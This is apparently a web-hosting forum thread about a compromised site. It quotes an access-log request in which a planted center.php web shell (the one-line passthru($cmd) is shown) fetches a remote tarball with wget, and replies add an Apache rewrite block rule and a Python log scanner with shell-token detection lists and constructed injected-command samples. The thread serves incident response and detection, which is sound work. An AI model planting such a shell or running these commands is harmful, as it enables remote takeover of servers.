202.62.19.*** - - [27/Sep/2006:09:11:31 -0700] "GET /center.php?cmd=wget%20http://ncua.idv.tw/nuke/cache/dalnet.tgz HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
I cannot find when or where the two scripts, a.php and center.php, were installed in my root directory, but over a couple of days someone was pretty active snooping around my configuration files.
center.php is a passthru function.
<?
// $cmd is never assigned in the script: it is filled from the query string by
// register_globals, so ?cmd=... runs that string as a shell command on the server
passthru($cmd);
?>
a.php is busy trying to find out everything that it can about the server and its configuration.
I don't know that everyone who uses this particular UA is a hacker, but it gets a permanent ban on my site. I'm on a shared host, and I cannot completely discount the possibility that my passwords were hacked. But since I can't find where these files were PUT in my root, I suspect another account on the host was hacked.
[edited by: volatilegx at 12:54 am (utc) on Oct. 6, 2006]
[edit reason] obfuscated ip address [/edit]
If it's not within your goals to deny the entire 202 range, here's a solution for InfoPath requests from 202's:
RewriteEngine On
# Both conditions must match (consecutive RewriteCond lines are ANDed by default):
# the User-Agent contains "InfoPath" and the client address starts with 202.
RewriteCond %{HTTP_USER_AGENT} InfoPath
RewriteCond %{REMOTE_ADDR} ^202\.
# Any URL requested by such a client gets a 403 Forbidden
RewriteRule .* - [F]
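Added example, written for this page and not code from either poster: a Python scanner that parses combined-format access-log lines like the one quoted in the first post, percent-decodes each query-string value (twice, to unmask double-encoded payloads), and flags parameters that carry a download command or shell metacharacters, which is how the center.php hits stand out in the log. It also applies the reply's two RewriteCond checks (User-Agent contains InfoPath, address starts with 202.) to every line, so you can see which of the flagged requests that rule would have refused and which it would have let through. Only the first log line is from the post; the other three are constructed for the example, and example.invalid is a placeholder host.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" log format, the layout of the line quoted in the first post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Things a legitimate query-string value on a CMS should never contain.
SHELL_TOKENS = ("wget ", "curl ", "lynx ", "fetch ", "perl ", "chmod ", "/bin/sh", "uname")
SHELL_META = re.compile(r"[;|`]|\$\(")

# Constructed sample log: line 1 is the request from the original post (IP obfuscated as
# on the page); lines 2-4 are invented for this example (example.invalid is a placeholder).
SAMPLE_LOG = [
    '202.62.19.*** - - [27/Sep/2006:09:11:31 -0700] "GET /center.php?cmd=wget%20http://ncua.idv.tw/nuke/cache/dalnet.tgz HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"',
    '202.62.19.*** - - [27/Sep/2006:09:12:02 -0700] "GET /center.php?cmd=tar%20xzf%20dalnet.tgz%3Bid HTTP/1.1" 200 240 "-" "Mozilla/5.0 (X11; Linux i686)"',
    '202.62.19.*** - - [27/Sep/2006:09:13:40 -0700] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"',
    '10.0.0.5 - - [28/Sep/2006:01:02:03 -0700] "GET /a.php?cmd=%2577get%2520http://example.invalid/x HTTP/1.1" 200 5 "-" "curl/7.15.0"',
]


def decode_query(query):
    """Split on '&' ourselves (so an encoded ';' inside a command is never treated as a
    separator) and decode each value twice to unmask double-encoded payloads like %2577get."""
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.append((unquote_plus(key), unquote_plus(unquote_plus(value))))
    return params


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = decode_query(parts.query)
    return rec


def suspicious_params(rec):
    """Parameters whose decoded value looks like a shell command."""
    hits = []
    for key, value in rec["params"]:
        low = value.lower()
        if any(tok in low for tok in SHELL_TOKENS) or SHELL_META.search(value):
            hits.append((key, value))
    return hits


def matches_rewrite_rule(rec):
    """The reply's two RewriteCond lines: UA contains 'InfoPath' AND address begins with 202."""
    return "InfoPath" in rec["ua"] and rec["ip"].startswith("202.")


def scan(lines):
    """Web-shell style requests in the log, each marked with whether the UA+IP rule blocks it."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = suspicious_params(rec)
        if hits:
            findings.append({
                "ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                "status": rec["status"], "params": hits,
                "blocked_by_rule": matches_rewrite_rule(rec),
            })
    return findings


def would_block(lines):
    """Every request, malicious or not, that the InfoPath + 202. rule would refuse."""
    return [rec for rec in map(parse_line, lines) if rec and matches_rewrite_rule(rec)]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "blocked by rule" if f["blocked_by_rule"] else "NOT blocked by rule"
        print(f'{f["ip"]} {f["path"]} {f["params"]} -> {flag}')
    print("rule would also refuse:", [(r["ip"], r["path"]) for r in would_block(SAMPLE_LOG)])
```

Run against the sample, the scanner flags three requests: the posted wget fetch, a follow-up from the same address with a different User-Agent (which the rewrite rule does not touch, since the UA no longer says InfoPath), and a double-encoded wget from an unrelated address. Meanwhile the rule also refuses the harmless /index.php hit from a 202. InfoPath browser. That is the caveat with UA-plus-IP blocking: the attacker changes a header and is back in, while ordinary visitors matching the pattern are locked out. The log-side check on the decoded query string catches the behaviour rather than the identity, and is the kind of thing to run over the whole log, plus the shared host's FTP logs, to find when and through which account center.php and a.php were written.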